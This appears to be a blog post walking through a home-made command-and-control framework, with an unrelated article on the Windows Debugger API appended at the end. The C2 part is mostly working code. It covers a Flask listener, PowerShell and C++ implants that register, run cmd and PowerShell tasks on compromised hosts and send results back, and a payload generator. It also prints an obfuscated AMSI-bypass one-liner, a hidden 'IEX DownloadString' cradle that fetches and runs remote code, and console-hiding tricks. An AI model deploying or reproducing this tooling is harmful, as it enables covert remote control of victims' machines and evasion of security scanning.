The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.

/reg

/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.

When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.

With these information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side can know its name.

@self.app.route("/reg", methods=['POST'])
def registerAgent():
    name     = ''.join(choice(ascii_uppercase) for i in range(6))
    remoteip = flask.request.remote_addr
    hostname = flask.request.form.get("name")
    Type     = flask.request.form.get("type")
    success("Agent {} checked in.".format(name))
    writeToDatabase(agentsDB, Agent(name, self.name, remoteip, hostname, Type, self.key))
    return (name, 200)

/tasks/<name>

/tasks/<name> is the endpoint that agents request to download their tasks, <name> is a placeholder for the agent’s name, it only accepts GET requests.

It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).

@self.app.route("/tasks/<name>", methods=['GET'])
def serveTasks(name):
    if os.path.exists("{}/{}/tasks".format(self.agentsPath, name)):
        
        with open("{}{}/tasks".format(self.agentsPath, name), "r") as f:
            task = f.read()
            clearAgentTasks(name)
        
        return(task,200)
    else:
        return ('',204)

/results/<name>

/results/<name> is the endpoint that agents request to send results, <name> is a placeholder for the agent’s name, it only accepts POST requests and it takes one parameter: result for the results.

It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.

@self.app.route("/results/<name>", methods=['POST'])
def receiveResults(name):
    result = flask.request.form.get("result")
    displayResults(name, result)
    return ('',204)

/download/<name>

/download/<name> is responsible for downloading files, <name> is a placeholder for the file name, it only accepts GET requests.

It reads the requested file from the files path and it sends it.

@self.app.route("/download/<name>", methods=['GET'])
def sendFile(name):
    f    = open("{}{}".format(self.filePath, name), "rt")
    data = f.read()
            
    f.close()
    return (data, 200)

/sc/<name>

/sc/<name> is just a wrapper around the /download/<name> endpoint for powershell scripts, it responds with a download cradle prepended with a oneliner to bypass AMSI, the oneliner downloads the original script from /download/<name> , <name> is a placeholder for the script name, it only accepts GET requests.

It takes the script name, creates a download cradle in the following format:

IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/download/SCRIPT_NAME')

and prepends that with the oneliner and responds with the full line.

@self.app.route("/sc/<name>", methods=['GET'])
def sendScript(name):
    amsi     = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE](\"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' )).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),(\"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"(${n`ULl},${t`RuE} ); "
    oneliner = "{}IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/download/{}\')".format(amsi,self.ipaddress,str(self.port),name)
    
    return (oneliner, 200)

Starting and Stopping

I had to start listeners in threads, however flask applications don’t provide a reliable way to stop the application once started, the only way was to kill the process, but killing threads wasn’t also so easy, so what I did was creating a Process object for the function that starts the application, and a thread that starts that process which means that terminating the process would kill the thread and stop the application.

...
	
def run(self):
    self.app.logger.disabled = True
    self.app.run(port=self.port, host=self.ipaddress)

...
    
def start(self):
    
    self.server = Process(target=self.run)

    cli = sys.modules['flask.cli']
    cli.show_server_banner = lambda *x: None

    self.daemon = threading.Thread(name = self.name,
                                       target = self.server.start,
                                       args = ())
    self.daemon.daemon = True
    self.daemon.start()

    self.isRunning = True
    
def stop(self):
    
    self.server.terminate()
    self.server    = None
    self.daemon    = None
    self.isRunning = False

...

Agents

Basic Info

As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.

When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).

After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.

After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.

We can represent that in pseudo code like this:

get hostname
send [hostname, type], get name

loop{
	
	check if there are any new tasks
	
	if new_tasks{
    	
            execute tasks
    	    send results
    
    }
    
    else{
    	do nothing
    }
    
    sleep n 
}

So far, agents can only do two basic things, execute cmd and powershell.

PowerShell Agent

I won’t talk about the crypto functions here, I will leave that for the encryption part.

First 5 lines of the agent are just the basic variables which are the IP address, port, key, name and the time to sleep:

$ip   = "REPLACE_IP"
$port = "REPLACE_PORT"
$key  = "REPLACE_KEY"
$n    = 3
$name = ""

As mentioned earlier, It gets the hostname, sends the registration request and receives its name:

$hname = [System.Net.Dns]::GetHostName()
$type  = "p"
$regl  = ("http" + ':' + "//$ip" + ':' + "$port/reg")
$data  = @{
    name = "$hname" 
    type = "$type"
    }
$name  = (Invoke-WebRequest -UseBasicParsing -Uri $regl -Body $data -Method 'POST').Content

Based on the received name it creates the variables for the tasks uri and the results uri:

$resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
$taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")

Then it starts the infinite loop:

for (;;){
...
sleep $n
}

Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:

$task  = (Invoke-WebRequest -UseBasicParsing -Uri $taskl -Method 'GET').Content
    
    if (-Not [string]::IsNullOrEmpty($task)){

Inside the task execution code block it takes the encrypted response and decrypts it, splits it then saves the first word in a variable called flag:

$task = Decrypt $key $task
$task = $task.split()
$flag = $task[0]

If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.

if ($flag -eq "VALID"){

After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:

$command = $task[1]
$args    = $task[2..$task.Length]

There are 5 valid commands, shell, powershell, rename, sleep and quit.

shell executes cmd commands, powershell executes powershell commands, rename changes the agent’s name, sleep changes the sleep time and quit just exits.

Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:

function shell($fname, $arg){
    
    $pinfo                        = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName               = $fname
    $pinfo.RedirectStandardError  = $true
    $pinfo.RedirectStandardOutput = $true
    $pinfo.UseShellExecute        = $false
    $pinfo.Arguments              = $arg
    $p                            = New-Object System.Diagnostics.Process
    $p.StartInfo                  = $pinfo
    
    $p.Start() | Out-Null
    $p.WaitForExit()
    
    $stdout = $p.StandardOutput.ReadToEnd()
    $stderr = $p.StandardError.ReadToEnd()

    $res = "VALID $stdout`n$stderr"
    $res
}

It starts a new process with the given file name whether it was cmd.exe or powershell.exe and passes the given arguments, then it receives stdout and stderr and returns the result which is the VALID flag appended with stdout and stderr separated by a newline.

Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:

if ($command -eq "shell"){
    $f    = "cmd.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }
    elseif ($command -eq "powershell"){
    
    $f    = "powershell.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }

The sleep command updates the n variable then sends an empty result indicating that it completed the task:

elseif ($command -eq "sleep"){
    $n    = [int]$args[0]
    $data = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The rename command updates the name variable and updates the tasks and results uris, then it sends an empty result indicating that it completed the task:

elseif ($command -eq "rename"){
    $name    = $args[0]
    $resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
    $taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")
    
    $data    = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The quit command just exits:

elseif ($command -eq "quit"){
	exit
    }

C++ Agent

The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.

Sending http requests wasn’t as easy as it was in powershell, I used the winhttp library and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. And they’re almost the same function so I guess I will rewrite them to be one function later.


std::string Get(std::string ip, unsigned int port, std::string uri)
{
    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"GET", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      WINHTTP_NO_ADDITIONAL_HEADERS,
                                      0,
                                      WINHTTP_NO_REQUEST_DATA,
                                      0,
                                      0,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;
}

std::string Post(std::string ip, unsigned int port, std::string uri, std::string dat)
{
    LPSTR data     = const_cast<char*>(dat.c_str());;
    DWORD data_len = strlen(data);

    LPCWSTR additionalHeaders = L"Content-Type: application/x-www-form-urlencoded\r\n";
    DWORD headersLength       = -1;

    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"POST", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      additionalHeaders,
                                      headersLength,
                                      (LPVOID)data,
                                      data_len,
                                      data_len,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;

}

The shell function does the almost the same thing as the shell function in the other agent, some of the code is taken from Stack Overflow and I edited it:


CStringA shell(const wchar_t* cmd)
{
    CStringA result;
    HANDLE hPipeRead, hPipeWrite;

    SECURITY_ATTRIBUTES saAttr = {sizeof(SECURITY_ATTRIBUTES)};
    saAttr.bInheritHandle = TRUE; 
    saAttr.lpSecurityDescriptor = NULL;

    
    if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0))
        return result;

    STARTUPINFOW si = {sizeof(STARTUPINFOW)};
    si.dwFlags     = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdOutput  = hPipeWrite;
    si.hStdError   = hPipeWrite;
    si.wShowWindow = SW_HIDE; 

    PROCESS_INFORMATION pi = { 0 };

    BOOL fSuccess = CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (! fSuccess)
    {
        CloseHandle(hPipeWrite);
        CloseHandle(hPipeRead);
        return result;
    }

    bool bProcessEnded = false;
    for (; !bProcessEnded ;)
    {
        bProcessEnded = WaitForSingleObject( pi.hProcess, 50) == WAIT_OBJECT_0;

        for (;;)
        {
            char buf[1024];
            DWORD dwRead = 0;
            DWORD dwAvail = 0;

            if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL))
                break;

            if (!dwAvail)
                break;

            if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead)
                break;

            buf[dwRead] = 0;
            result += buf;
        }
    }

    CloseHandle(hPipeWrite);
    CloseHandle(hPipeRead);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return result;
}

I would like to point out an important option in the process created by the shell function which is:

si.wShowWindow = SW_HIDE; 

This is responsible for hiding the console window, this is also added in the main() function of the agent to hide the console window:

int main(int argc, char const *argv[]) 
{

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    ...

Agent Handler

Now that we’ve talked about the agents, let’s go back to the server and take a look at the agent handler.

An Agent object is instantiated with a name, a listener name, a remote address, a hostname, a type and an encryption key:

class Agent:

    def __init__(self, name, listener, remoteip, hostname, Type, key):

        self.name      = name
        self.listener  = listener
        self.remoteip  = remoteip
        self.hostname  = hostname
        self.Type      = Type
        self.key       = key

Then it defines the sleep time which is 3 seconds by default as discussed, it needs to keep track of the sleep time to be able to determine if an agent is dead or not when removing an agent, otherwise it will keep waiting for the agent to call forever:

self.sleept    = 3

After that it creates the needed directories and files:

self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
self.tasksPath = "{}tasks".format(self.Path, self.name)

if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.

self.menu = menu.Menu(self.name)
        
self.menu.registerCommand("shell", "Execute a shell command.", "<command>")
self.menu.registerCommand("powershell", "Execute a powershell command.", "<command>")
self.menu.registerCommand("sleep", "Change agent's sleep time.", "<time (s)>")
self.menu.registerCommand("clear", "Clear tasks.", "")
self.menu.registerCommand("quit", "Task agent to quit.", "")

self.menu.uCommands()

self.Commands = self.menu.Commands

I won’t talk about the wrapper functions because we only care about the core functions.

First function is the writeTask() function, which is a quite simple function, it takes the task and prepends it with the VALID flag then it writes it to the tasks path:

def writeTask(self, task):
    
    if self.Type == "p":
        task = "VALID " + task
        task = ENCRYPT(task, self.key)
    elif self.Type == "w":
        task = task
	
    with open(self.tasksPath, "w") as f:
            f.write(task)

As you can see, it only encrypts the task in case of powershell agent only, that’s because there’s no encryption in the c++ agent (more on that in the encryption part).

Second function I want to talk about is the clearTasks() function which just deletes the tasks file, very simple:

def clearTasks(self):
    
    if os.path.exists(self.tasksPath):
        os.remove(self.tasksPath)
    else:
        pass

Third function is a very important function called update(), this function gets called when an agent is renamed and it updates the paths. As seen earlier, the paths depend on the agent’s name, so without calling this function the agent won’t be able to download its tasks.

def update(self):
    
    self.menu.name = self.name
    self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
    self.tasksPath = "{}tasks".format(self.Path, self.name)
        
    if os.path.exists(self.Path) == False:
        os.mkdir(self.Path)

The remaining functions are wrappers that rely on these functions or helper functions that rely on the wrappers. One example is the shell function which just takes the command and writes the task:

def shell(self, args):
    
    if len(args) == 0:
        error("Missing command.")
    else:
        command = " ".join(args)
        task    = "shell " + command
        self.writeTask(task)

The last function I want to talk about is a helper function called displayResults which takes the sent results and the agent name. If the agent is a powershell agent it decrypts the results and checks their validity then prints them, otherwise it will just print the results:

def displayResults(name, result):

    if isValidAgent(name,0) == True:

        if result == "":
            success("Agent {} completed task.".format(name))
        else:
            
            key = agents[name].key
            
            if agents[name].Type == "p":

                try:
                    plaintext = DECRYPT(result, key)
                except:
                    return 0
            
                if plaintext[:5] == "VALID":
                    success("Agent {} returned results:".format(name))
                    print(plaintext[6:])
                else:
                    return 0
            
            else:
                success("Agent {} returned results:".format(name))
                print(result)

Payloads Generator

Any c2 server would be able to generate payloads for active listeners, as seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in case of the c++ agent.

PowerShell

Doing this with the powershell agent is simple because a powershell script is just a text file so we just need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.

The powershell function takes a listener name, and an output name. It grabs the needed options from the listener then it replaces the needed strings in the powershell template and saves the new file in two places, /tmp/ and the files path for the listener. After doing that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).

def powershell(listener, outputname):
    
    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port
    key     = listeners[listener].key

    with open("./lib/templates/powershell.ps1", "rt") as p:
        payload = p.read()

    payload = payload.replace('REPLACE_IP',ip)
    payload = payload.replace('REPLACE_PORT',str(port))
    payload = payload.replace('REPLACE_KEY', key)

    with open(outpath, "wt") as f:
        f.write(payload)
    
    with open("{}{}".format(listeners[listener].filePath, outputname), "wt") as f:
        f.write(payload)

    oneliner = "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/sc/{}\')\"".format(ip, str(port), outputname)

    success("File saved in: {}".format(outpath))
    success("One liner: {}".format(oneliner))

Windows Executable (C++ Agent)

It wasn’t as easy as it was with the powershell agent, because the c++ agent would be a compiled PE executable.

It was a huge problem and I spent a lot of time trying to figure out what to do, that was when I was introduced to the idea of a stub.

The idea is to append whatever data that needs to be dynamically assigned to the executable, and design the program in a way that it reads itself and pulls out the appended information.

In the source of the agent I added a few lines of code that do the following:

  • Open the file as a file stream.
  • Move to the end of the file.
  • Read 2 lines.
  • Save the first line in the IP variable.
  • Save the second line in the port variable.
  • Close the file stream.
std::ifstream ifs(argv[0]);
	
ifs.seekg(TEMPLATE_EOF);
	
std::getline(ifs, ip);
std::getline(ifs, sPort);

ifs.close();

To get the right EOF I had to compile the agent first, then update the agent source and compile again according to the size of the file.

For example this is the current definition of TEMPLATE_EOF for the x64 agent:

#define TEMPLATE_EOF 52736

If we take a look at the size of the file we’ll find that it’s the same:

# ls -la
-rwxrwxr-x 1 ... ... 52736 ... ... ... winexe64.exe

The winexe function takes a listener name, an architecture and an output name, grabs the needed options from the listener and appends them to the template corresponding to the selected architecture and saves the new file in /tmp:

def winexe(listener, arch, outputname):

    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port

    if arch == "x64":
        copyfile("./lib/templates/winexe/winexe64.exe", outpath)
    elif arch == "x32":
        copyfile("./lib/templates/winexe/winexe32.exe", outpath)        
    
    with open(outpath, "a") as f:
        f.write("{}\n{}".format(ip,port))

    success("File saved in: {}".format(outpath))

Encryption

I’m not very good at cryptography so this part was the hardest of all. At first I wanted to use AES and do Diffie-Hellman key exchange between the server and the agent. However I found that powershell can’t deal with big integers without the .NET class BigInteger, and because I’m not sure that the class would be always available I gave up the idea and decided to hardcode the key while generating the payload because I didn’t want to risk the compatibility of the agent. I could use AES in powershell easily, however I couldn’t do the same in c++, so I decided to use a simple xor but again there were some issues, that’s why the winexe agent won’t be using any encryption until I figure out what to do.

Let’s take a look at the crypto functions in both the server and the powershell agent.

Server

The AESCipher class uses the AES class from the pycrypto library, it uses AES CBC 256.

An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:

class AESCipher:
    
    def __init__(self, key):

        self.key = base64.b64decode(key)
        self.bs  = AES.block_size

There are two functions to pad and unpad the text with zeros to match the block size:

def pad(self, s):
    return s + (self.bs - len(s) % self.bs) * "\x00"

def unpad(self, s):
    s = s.decode("utf-8")
    return s.rstrip("\x00")

The encryption function takes plain text, pads it, creates a random IV, encrypts the plain text and returns the IV + the cipher text base-64 encoded:

def encrypt(self, raw):
    
    raw      = self.pad(raw)
    iv       = Random.new().read(AES.block_size)
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    
    return base64.b64encode(iv + cipher.encrypt(raw.encode("utf-8")))

The decryption function does the opposite:

def decrypt(self,enc):
    
    enc      = base64.b64decode(enc)
    iv       = enc[:16]
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    plain    = cipher.decrypt(enc[16:])
    plain    = self.unpad(plain)
    
    return plain 

I created two wrapper function that rely on the AESCipher class to encrypt and decrypt data:

def ENCRYPT(PLAIN, KEY):

    c   = AESCipher(KEY)
    enc = c.encrypt(PLAIN)

    return enc.decode()

def DECRYPT(ENC, KEY):

    c   = AESCipher(KEY)
    dec = c.decrypt(ENC)

    return dec

And finally there’s the generateKey function which creates a random 32 bytes key and base-64 encodes it:

def generateKey():

    key    = base64.b64encode(os.urandom(32))
    return key.decode()

PowerShell Agent

The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.

First function is the Create-AesManagedObject which instantiates an AesManaged object using the given key and IV. It’s a must to use the same options we decided to use on the server side which are CBC mode, zeros padding and 32 bytes key length:

function Create-AesManagedObject($key, $IV) {
    
    $aesManaged           = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize   = 256

After that it checks if the provided key and IV are of the type String (which means that the key or the IV is base-64 encoded), depending on that it decodes the data before using them, then it returns the AesManaged object.

if ($IV) {
        
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        
        else {
            $aesManaged.IV = $IV
        }
    }
    
    if ($key) {
        
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        
        else {
            $aesManaged.Key = $key
        }
    }
    
    $aesManaged
}

The Encrypt function takes a key and a plain text string, converts that string to bytes, then it uses the Create-AesManagedObject function to create the AesManaged object and it encrypts the string with a random generated IV.

It returns the cipher text base-64 encoded.

function Encrypt($key, $unencryptedString) {
    
    $bytes             = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged        = Create-AesManagedObject $key
    $encryptor         = $aesManaged.CreateEncryptor()
    $encryptedData     = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    [System.Convert]::ToBase64String($fullData)
}

The opposite of this process happens with the Decrypt function:

function Decrypt($key, $encryptedStringWithIV) {
    
    $bytes           = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV              = $bytes[0..15]
    $aesManaged      = Create-AesManagedObject $key $IV
    $decryptor       = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
    $aesManaged.Dispose()
    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)

}

Listeners / Agents Persistency

I used pickle to serialize agents and listeners and save them in databases, when you exit the server it saves all of the agent objects and listeners, then when you start it again it loads those objects again so you don’t lose your agents or listeners.

For the listeners, pickle can’t serialize objects that use threads, so instead of saving the objects themselves I created a dictionary that holds all the information of the active listeners and serialized that, the server loads that dictionary and starts the listeners again according to the options in the dictionary.

I created wrapper functions that read, write and remove objects from the databases:

def readFromDatabase(database):
    
    data = []

    with open(database, 'rb') as d:
        
        while True:
            try:
                data.append(pickle.load(d))
            except EOFError:
                break
    
    return data

def writeToDatabase(database,newData):
    
    with open(database, "ab") as d:
        pickle.dump(newData, d, pickle.HIGHEST_PROTOCOL)

def removeFromDatabase(database,name):
    
    data = readFromDatabase(database)
    final = OrderedDict()

    for i in data:
        final[i.name] = i
    
    del final[name]
    
    with open(database, "wb") as d:
        for i in final:
            pickle.dump(final[i], d , pickle.HIGHEST_PROTOCOL)

Demo

I will show you a quick demo on a Windows Server 2016 target.

This is how the home of the server looks like:




Let’s start by creating a listener:




Now let’s create a payload, I created the three available payloads:




After executing the payloads on the target we’ll see that the agents successfully contacted the server:




Let’s rename the agents:





I executed 4 simple commands on each agent:






Then I tasked each agent to quit.

And that concludes this blog post, as I said before I would appreciate all the feedback and the suggestions so feel free to contact me on twitter @Ahm3d_H3sham.

If you liked the article tweet about it, thanks for reading.

Windows Debugger API — The End of Versioned Structures

Windows Debugger API — The End of Versioned Structures

Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis of data on a machine. This API allows us to open a dump file taken on any windows machine and read information from it using the symbols that match the specific modules contained in the dump.

This API can be used in live debugging as well, either user-mode debugging of a process or kernel debugging. This post will show how to use it to analyze a memory dump, but this can be converted to live debugging relatively easily.

The main benefit of the debugger API is that it uses the specific symbols for the Windows version that it is running against, letting us write code that will work with any Windows version without having to keep an ever-growing header of structures for different versions, and needing to choose the right one and update our code every time the structure changes. For example, a common data structure to look at on Windows is the process, represented in the kernel by the EPROCESS structure. This structure changes almost every Windows build, meaning that fields inside it keep moving around. A field we are interested in might be at offset 0x100 in one Windows version, 0x120 in another, 0x108 in another, and so on. If we use the wrong offset the driver will not work properly and is very likely to accidentally crash the system. By using the symbols, we also receive the correct size and type of each structure and its sub-structures, so a nested structure getting larger, or a field changing its type, for example being a push lock in one version and a spin lock another, will be handled correctly by the debugger API without and code changes on our side.

The debugger API avoids this problem entirely by using symbols, so we can write our code once and it will run successfully on dumps taken from every possible Windows version without any need for updates when new builds are released. Also, it runs in user-mode so it doesn’t have all the inherent risks that kernel mode code carries with it, and since it can operate on a dump file, it doesn’t have to run on the machine that it analyzes. Which can be a huge benefit, as sometimes we can’t run our debugging tools on the machine we are interested in. This also lets us do extremely complicated things on much faster machines, such as analyzing a dump — or many dumps — in the cloud.

The main disadvantage of it is that the interface is not as easy as just using the types directly, and it takes some effort to get used to it. It also means slightly uglier, less readable code, unless you create macros around some of the calls.

In this post we’ll learn how to write a simple program that opens a memory dump iterates over all the processes and prints the name and PID of each one. For anyone not familiar with process representation in the Windows kernel, all the processes are linked together by a linked list (that is a LIST_ENTRY structure that points to the next entry and the previous entry). This list is pointed to by the nt!PsActiveProcessHead symbol and the list is found at the ActiveProcessLinks field of the EPROCESS structure. Of course, the symbol is not exported and the EPROCESS structure is not available in any of the public headers so implementing this in a driver will require some hard coded offsets and version checks to get the right offsets for each. Or we can use the debugger API instead!

To access all of this functionality we’ll need to include DbgEng.h and link against DbgEng.lib. And this is the right time for an important tip shared by Alex Ionescu — the debugging-related DLLs supplied by Windows are unstable and will often simply not work at all and leave you confused and wondering what you did wrong and why your code that was perfectly good yesterday is suddenly failing. WinDbg comes with its own versions of all the DLLs required for this functionality, that are way better. So you’ll want to copy Dbgeng.dll, Dbghelp.dll and Symsrv.dll from the directory where windbg.exe is into your output directory of this project. Do whatever you need to remember to always use the DLLs that come with WinDbg, this will save you a lot of time and frustration later.

Now that we have that covered we can start writing the code. Before we can access the dump file, we need to initialize 4 basic variables:

IDebugClient* debugClient;
IDebugSymbols* debugSymbols;
IDebugDataSpaces* dataSpaces;
IDebugControl* debugControl;

These will let us open the dump, access its memory and the symbols for all the modules in it and use them to parse the contents of the dump. First, we call DebugCreate to initialize the debugClient variable:

DebugCreate(__uuidof(IDebugClient), (PVOID*)&debugClient);

Note that all the functions we’ll use here return an HRESULT that should be validated using SUCCEEDED(result). In this post I will skip those validations to keep the code smaller and easier to read, but in any real program these should not be skipped.

After we initialized debugClient we can use it to initialize the other 3:

debugClient->QueryInterface(__uuidof(IDebugSymbols), 
(PVOID*)&debugSymbols);
debugClient->QueryInterface(__uuidof(IDebugDataSpaces),
(PVOID*)&dataSpaces);
debugClient->QueryInterface(__uuidof(IDebugControl),
(PVOID*)&debugControl);

There, setup done. We can open our dump file with debugClient->OpenDumpFile and then wait until all symbol files are loaded:

debugClient->OpenDumpFile(DumpFilePath);
debugControl->WaitForEvent(DEBUG_WAIT_DEFAULT, 0);

